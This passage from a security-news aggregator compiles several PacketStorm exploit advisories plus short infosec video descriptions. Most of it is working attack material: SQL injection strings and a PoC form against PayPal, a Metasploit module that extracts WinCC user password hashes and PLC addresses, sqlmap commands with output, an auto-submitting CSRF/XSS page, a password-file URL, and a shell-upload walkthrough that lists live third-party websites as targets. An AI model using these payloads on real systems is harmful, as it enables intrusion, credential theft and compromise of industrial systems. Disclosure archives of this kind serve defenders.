sql commands on the affected application dbms. The vulnerability is located in the Confirm Email module with the bound vulnerable id input field. The validation of the confirm number input field is watching all the context since the first valid number matches. The attacker uses a valid number and includes the statement after it to let both pass through the paypal application filter. The result is the successful execution of the sql command when the module is processing to reload the page module. Exploitation of the vulnerability requires a low privileged application user account to access the website area and can processed without user interaction. Successful exploitation of the vulnerability results in web application or module compromise via blind sql injection attack. Vulnerable Service(s): [+] Paypal Inc - Core Application (www.paypal.com) Vulnerable Module(s): [+] Confirm Email Vulnerable Section(s): [+] Confirm Number (Verification) - Input Field Vulnerable Parameter(s): [+] login_confirm_number_id - login_confirm_number Proof of Concept: ================= The blind sql injection vulnerability can be exploited by remote attackers with low privileged application user account and without required user interaction. For demonstration or reproduce ... URL1: Request a Session with 2 different mails (Step1) https://www.paypal.com/de/ece/cn=06021484023174514599&em=admin@vulnerabiliuty-lab.com https://www.paypal.com/de/ece/cn=06021484023174514599&em=01x445@gmail.com URL2: Injection into ID Confirm Field (Step2) https://www.paypal.com/de/cgi-bin/webscr?cmd=_confirm-email-password-submit& dispatch=5885d80a13c0db1f8e263663d3faee8d7283e7f0184a5674430f290db9e9c846 1. Open the website of paypal and login as standard user with a restricted account 2. Switch to the webscr > Confirm Email module of the application 3. Request a login confirm id when processing to load a reset 4. Take the valid confirm number of the mail and insert it into the email confirm number verification module input fields 5. Switch to the last char of the valid confirm number in the input field and inject own sql commands as check to proof the validation Test Strings: -1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1-1' -1'+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1--1' 1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1 1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=-1' 6. Normally the website with the generated ID confirm button is bound to the standard template. 7. Inject substrings with the id -1+sql-query to proof for blind injections in the input field 8. The bottom bar gets loaded as result for the successful executed sql query 8. Now, the remote attacker can manipulate the paypal core database with a valid confirm number + his own sql commands Bug Type: Blind SQL INJECTION [POST] Injection Vulnerability SESSION: DE - 22:50 -23:15 (paypal.com) Browser: Mozilla Firefox 14.01 PoC: <form method="post" action="https://www.paypal.com/de/cgi-bin/webscr?cmd=_confirm-email-submit& dispatch=5885d80a13c0db1f8e263663d3faee8d7283e7f0184a5674430f290db9e9c846" class=""> <p class="group"><label for="login_confirm_number_id"><span class="labelText"><span class="error"> Please enter it here</span></span></label><span class="field"><input id="login_confirm_number_id" class="xlarge" name="login_confirm_number" value="06021484023174514599-1+[BLIND SQL-INJECTION!]--" type="text"></span></p><p class="buttons"> <input name="confirm.x" value="Confirm" class="button primary" type="submit"></p><input name="form_charset" value="UTF-8" type="hidden"></form> Note: Do all requests ever with id to reproduce the issue. (-) is not possible as first char of the input request. Example(Wrong): -1+[SQL-Injection]&06021484023183514599 Example(Right): 06021484023183514599-1+[SQL-Injection]-- Example(Right): 06021484023183514599-1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1-1'-1'-- Test Mail(s): [+] 01x221@gmail.com and admin@vulnerability-lab.com Note: After inject was successful 2 times because of my check, the paypal website opened a security issue report message box as exception-handling. I included the details and information of my test and explained the issue and short time later it has been patched. Solution: ========= 2013-01-12: Vendor Fix/Patch Risk: ===== The security risk of the blind sql injection web vulnerability in the paypal core application is estimated as critical. Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Source: PacketStorm

Cardoza WordPress Poll plugin version 34.05 suffers from multiple remote SQL injection vulnerabilities. ############################# Exploit Title : Multiple SQL injection vulnerabilities in Cardoza Wordpress poll plugin Author:Marcela Benetrix home:www.girlinthemiddle.net Date: 01/21/13 version: 34.05 software link:http://wordpress.org/extend/plugins/cardoza-wordpress-poll/ ############################# Wordpress Poll plugin description Wordpress Poll is completely ajax powered polling system which supports both single and multiple selection of answers. It has interesting functions like statistics, user logs and the opportunity to lock the users by their ip,cookies or id. ########################## SQL injection location The problem is located in the file: CWPPoll.js, to be more specific viewPollResults and userlogs methods. Although both ajax functions are used in the administration side they can be accessed by an external script and their parameter(pollid) is not sanitised ########################## POC /wp-admin/admin-ajax.php/?poll_id=2 or 1=1&action=view_poll_result via post/ajax ############################ BONUS TRACK In the same plugin I found several functions that could have catastrophic results if they are handled by an attacker. function editAnswer(answerid, poll_id) function deleteAnswer(answerid, poll_id) function addAnswer(polls_id) function deletePoll() All of them can be acceded from an external call allowing the attacker to add,edit, delete an answer and in the worst case delete a poll. The caller is not verified. ########################### CVE identifier CVE-2013-1400 number has been assigned to all of the SQL injection issues CVE-2013-1401 for those functions which can be handled externally ########################## Vendor Notification 01/17/2013 to: the developer. He replied immediately and fixed the problem. Because of it, a new version has been released Source: PacketStorm

The Adult Webmaster Script from yagina.com saves password in a text file within the webroot. # Exploit Title: Yagina.com Adult Webmaster Script Admin Password Disclosure # Category:webapps # Description software : software website for webmasters promoting adult companies through referrals # Date: 21-1-2013 # Exploit Author: Dshellnoi Unix # Vendor Homepage: http://www.yagina.com/ # Software Link: http://sourceforge.net/projects/adultweb/?source=dlp #-----------------------------VULNERABIlITY DESCRIPTION------------------------------------# The failure comes from saving passwords in a text file with php fwrite function, that can be read by the url #---------------------------------EXPLOIT---------------------------------------------------# #exploit http://[url]/admin/userpwdadfasdfre.txt #-------------------------------------------------------------------------------------------# #Thanks to : Luisfer ,Ivan sanchez, Juan carlos garcia Source: PacketStorm

This Metasploit module receives sensitive information from the WinCC database. ## encoding: UTF-8 # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL def initialize(info = {}) super(update_info(info, 'Name' => 'Simatic WinCC info harvester', 'Description' => %q{ This module receives sensitive information from the WinCC database. }, 'Author' => [ 'Dmitry Nagibin', # research 'Gleb Gritsai <ggritsai@ptsecurity.ru>', # research 'Vyacheslav Egoshin <vegoshin@ptsecurity.ru>', # metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.ptsecurity.com' ] ], 'Version' => '$Revision$', 'DisclosureDate'=> 'Jun 3 2012' )) register_options( [ OptString.new('DOCUMENTS_FOLDER_NAME', [true, "Documents folder name", 'Documents']), ], self.class ) end def run if mssql_login_datastore # connect project_databases_names = q("SELECT name FROM master..sysdatabases WHERE name LIKE 'CC%_[0-9]'") # get db get_info project_databases_names else print_error "Can't connect to the database" end end def q query, show_errors = true, verbose = false, only_rows = true result = mssql_query(query, verbose) if !result[:errors].empty? and show_errors print_error "Error: #{result[:errors]}" print_error "Error query: #{query}" else only_rows ? result[:rows] : result end end def get_info dbs prj ={} dbs.map do |db| db = db.first # get db name prj[db] = {} # init hash prj[db]["name"] = q("SELECT DSN FROM #{db}.dbo.CC_CsSysInfoLog") prj[db]["admins"] = q("SELECT NAME, convert(varbinary, PASS) as PWD from #{db}.dbo.PW_USER WHERE PASS <> '' and GRPID = 1000") prj[db]["users"] = q("SELECT ID, NAME, convert(varbinary, PASS), GRPID FROM #{db}.[dbo].[PW_USER] WHERE PASS <> '' and GRPID <> 1000") prj[db]["groups"] = q("SELECT ID, NAME FROM #{db}.[dbo].[PW_USER] WHERE PASS = ''") prj[db]["plcs"] = q("SELECT CONNECTIONNAME, PARAMETER FROM #{db}.[dbo].[MCPTCONNECTION]") prj[db]["tags"] = q("SELECT VARNAME,VARTYP,COMMENTS FROM #{db}.[dbo].[PDE#TAGs]") prj[db]["plcs"] = prj[db]["plcs"].map do |name, ip| # get plc IP real_ip = ip # set current value real_ip = ip.scan(/\d+\.\d+\.\d+\.\d+/).first if ip =~ /\d+\.\d+\.\d+\.\d+/ # if ip notation found [name, real_ip] end print_good "Project: #{prj[db]["name"].first.first}\n" # print project name #Table data print_table %w|ID NAME| , prj[db]["groups"], "WinCC groups" print_table %w|Name Password(hex)| , prj[db]["admins"], "WinCC administrator" print_table %w|ID NAME Password(hex) GRPID| , prj[db]["users"], "WinCC users" print_table %w|VARNAME VARTYP COMMENTS| , prj[db]["tags"], "WinCC tags" print_table %w|CONNECTIONNAME PARAMETER| , prj[db]["plcs"], "WinCC PLCs" #check file access through batched queries if can_read_file? db settings = read_file get_value("Security settings path"), db if settings # save results to file File.open("/tmp/security_settings.xml", "w+") do |f| f.puts settings end end end print_line end end def print_table columns, rows, header = '' tbl = Rex::Ui::Text::Table.new( 'Indent' => 4, 'Header' => header, 'Columns' => columns ) unless rows.nil? rows.each do |r| tbl << r # add rows end print_line tbl.to_s end end #read file through batched queries def read_file file_name, db q("CREATE TABLE mydata (line varchar(8000));", false) q("BULK INSERT mydata FROM '#{file_name}';", false) result = q("select * from mydata", false) q("DROP TABLE mydata;", false) print_error("Can't read file: #{file_name}") if result.nil? result end #check account read file def can_read_file? db res = read_file get_value("test"), db print_status "Access read files! (#{get_value "test"} read)" unless res.nil? res.size > 0 # return true or false end def get_value i config = { "Security settings path" => %q|C:\Documents and Settings\All Users\Documents\SimaticSecurityControl\setRules.xml|, "test" => %q|C:\Windows\win.ini| } config[i] end end Source: PacketStorm

NConf version 1.3 suffers from remote blind SQL injection vulnerabilities in multiple parameters. # Exploit Title: nconf detail.php?detail_admin_items.php blind injection # Date: 2013/1/20 # Exploit Author: haidao?54haidao@gmail.com # Software Link: http://sourceforge.net/projects/nconf/files/nconf/ # Version: nconf 1.3 # Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3 i find two files we can inject : /nconf/detail.php?id=1 /nconf/detail_admin_items.php?type=attr&class=host&id=207 both the inject point is 'id',, u can inject it by sqlmap,,of course u mast have a account to login. inject like this: python sqlmap.py -u "http://192.168.2.103/nconf/detail.php?id=1" -p id --cookie="XXX" --dbs [*] starting at 23:45:22 [23:45:22] [INFO] resuming back-end DBMS 'mysql' [23:45:22] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6429=6429 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --- [23:45:22] [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 6.3 web application technology: PHP 5.3.3, Apache 2.2.15 back-end DBMS: MySQL 5.0.11 [23:45:22] [INFO] fetching database names [23:45:22] [INFO] fetching number of databases [23:45:22] [INFO] resumed: 3 [23:45:22] [INFO] resumed: information_schema [23:45:22] [INFO] resumed: nconf [23:45:22] [INFO] resumed: test available databases [3]: [*] information_schema [*] nconf [*] test Source: PacketStorm

WordPress Developer Formatter plugin suffers from a cross site request forgery vulnerability. ==================================================================================================================== # Exploit Title: Wordpress Developer Formatter CSRF Vulnerability # Date: 21/01/13 # Author: Junaid Hussain -[ illSecure Research Group ] - # Contact: illSecResearchGroup@Gmail.com | Website: illSecure.com # Software Link: http://wordpress.org/extend/plugins/devformatter/ # Tested on Wordpress Version 3.5, Should work on all versions. # Google Dork: inurl:devformatter/devformatter.php ==================================================================================================================== [#] Vulnerable Code Page: devinterface.php - Line: 46 <form method="post" action="options-general.php?page=devformatter/devformatter.php"> [#] no nonce given - Read: http://codex.wordpress.org/Function_Reference/wp_nonce_field ==================================================================================================================== // CSRF Exploit: <html> <body onload="javascript:document.forms[0].submit()"> <form method="post" action="http://[DOMAIN NAME]/wp-admin/options-general.php?page=devformatter/devformatter.php"> <input name="usedevformat" style="display:none;" type="checkbox" checked/> <input name="copyclipboartext" type="text" style="display:none;" value="</textarea><script>alert(/xss/)</script>" /> <input name="showtools" style="display:none;" type="checkbox" checked/> <textarea name="devfmtcss" rows="6" cols="60" style="display:none;"> body { background-image: url('javascript:alert("XSS");') !important; } </textarea> </form></html> ==================================================================================================================== [#] copyclipboartext & devfmtcss are both vulnerable to persistent xss which could lead to cookie stealing, malware distribution or even a defacememnt. [#] Disclaimer: This exploit is for Research/Educational/Academic purposes only, The Author of this exploit takes no responsibility for the way you use this exploit, you are responsible for your own actions. ==================================================================================================================== Original: http://illsecure.com/code/Wordpress-DevFormatter-CSRF-Vulnerability.txt Source: PacketStorm

Joomla GarysCookBook version 3.0.x suffers from a remote shell upload vulnerability. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ### # Title : Joomla Component (GarysCookBook v3.0.x) File Upload Vulnerability # Author : KedAns-Dz # E-mail : ked-h (@hotmail.com / @1337day.com) # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) # Web Site : www.1337day.com .net .org # FaCeb0ok : http://fb.me/Inj3ct0rK3d # TwiTter : @kedans # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com # Type : proof of concept - webapp 0day - remote - php # Tested on : Windows7 # Vendor : [http://www.garyscookbook.de/] ### # <3 <3 Greetings t0 Palestine <3 <3 # F-ck HaCking, Lov3 Explo8ting ! ######## [ Proof / Exploit ] ################|=> #! Google Dork : #+ allinurl:option=com_garyscookbook #+ http://[target]/[path]/index.php?option=com_garyscookbook -> try add (&func=newItem) #+ http://[target]/[path]/index.php?option=com_garyscookbook&func=newItem #! Upload Shell .gif and post the newItem #+ Use TemperDATA for change the shell to .php ## DeMo's : http://www.perinat.fr/index.php?option=com_garyscookbook&func=newItem http://thetexcritter.com/index.php?option=com_garyscookbook&func=newItem http://www.lejardindagnes.fr/index.php/index.php?option=com_garyscookbook&func=newItem http://lacarline.org/index.php?option=com_garyscookbook&func=newItem http://www.jannonce-enligne.com/index.php?option=com_garyscookbook&func=newItem !+ Find More targets in Google #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=============================================== # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem # Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ, # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) # Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs #============================================================================================================ Source: PacketStorm

Description: Welcome to the first of many Kippo Kronicles. These are videos of attacks against my honeypot. To learn more about Kippo and other IT Security stuff go to TekDefense - News. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: The Kippo Kronicles - Ep1

Description: In this video I will show you how to dump wireless key and password from the windows machine. This is a post exploitation demo - first I will exploit a windows system then using post-exploitation module for wireless key. If there is more then 2-3 keys store you will get the entire key in xml format with plain text password. I have used this module before but at that time this module will not giving plain text password, now it is working good and useful module. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Post -- Exploitation -- Dump Wireless Password In Plain Text

Description: Speakers: ADITYA K. SOOD SECURITY PRACTITIONER - ISEC PARTNERS | PHD CANDIDATE MSU RICHARD J. ENBODY ASSOCIATE PROFESSOR, DEP'T OF COMPUTER SCIENCE AND ENGINEERING AT MICHIGAN STATE UNIVERSITY Botnet designs are becoming more robust and sophisticated with the passage of time. While the security world is grappling with the security threats posed by Zeus and SpyEye, a new breed of botnets has begun to flourish. Present-day botnets such as smoke, ICE-X, NGR, etc use a mix of pre-existing and newly developed exploitation tactics to disseminate infections. Botnets have been successful in bypassing advanced defense mechanisms developed by the industry . This talk will take you to the journey of the lives of present-day botnets. With a good set of demonstrations, we will dissect the crux of upcoming breed of botnets. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Botnets Die Hard - Owned And Operated

Description: If there's one thing we know, it's that we're doing it wrong. Sacred cows make the best hamburgers, so in this year's talk I'm going to play with some techniques that are obviously wrong and evil and naive. There will also be a lot of very interesting code, spanning the range from high speed network stacks to random number engines to a much deeper analysis of non-neutral networks. Finally, we will revisit DNSSEC, both in code, and in what it can mean to change the battleground in your favor. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Black Ops

Description: In this video I will show you how to use Volatility Process Memory & Kernel Memory and Objects plugging usage, I will cover how to dump Process exe and Kernel Memory. Plugging are used • Process Memory o memmap o memdump o procmemdump o procexedump o vadwalk o vadtree o vadinfo o vaddump • Kernel Memory and Objects o modules o modscan o moddump o ssdt o driverscan o filescan o mutantscan o symlinkscan o thrdscan memmap For a brief inspection of the addressable memory pages in a process memdump To extract all data from the various memory segments in a process and dump them to a single file procmemdump To dump a process's executable (including the slack space), use the procmemdump command. procexedump To dump a process's executable vadwalk To briefly inspect a process's VAD nodes vadtree To display the VAD nodes in a visual tree form vadinfo The vadinfo command displays extended information about a process's VAD nodes vaddump To extract the data contained within each VAD segment Kernel Memory and Objects modules To view the list of kernel drivers loaded on the system modscan To scan physical memory for kernel modules, use the modscan command moddump To extract a kernel driver to a file ssdt To list the functions in the Native and GUI SSDTs driverscan To scan for DRIVER_OBJECTs in physical memory filescan To scan physical memory for FILE_OBJECTs mutantscan To scan physical memory for KMUTANT objects symlinkscan This plugin scans for symbolic link objects and outputs their information. thrdscan To scan for ETHREAD objects in physical memory Source : - CommandReference - volatility - Example usage cases and output for Volatility 2.0 commands - An advanced memory forensics framework - Google Project Hosting Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Volatility Process Memory - Kernel Memory And Objects Usage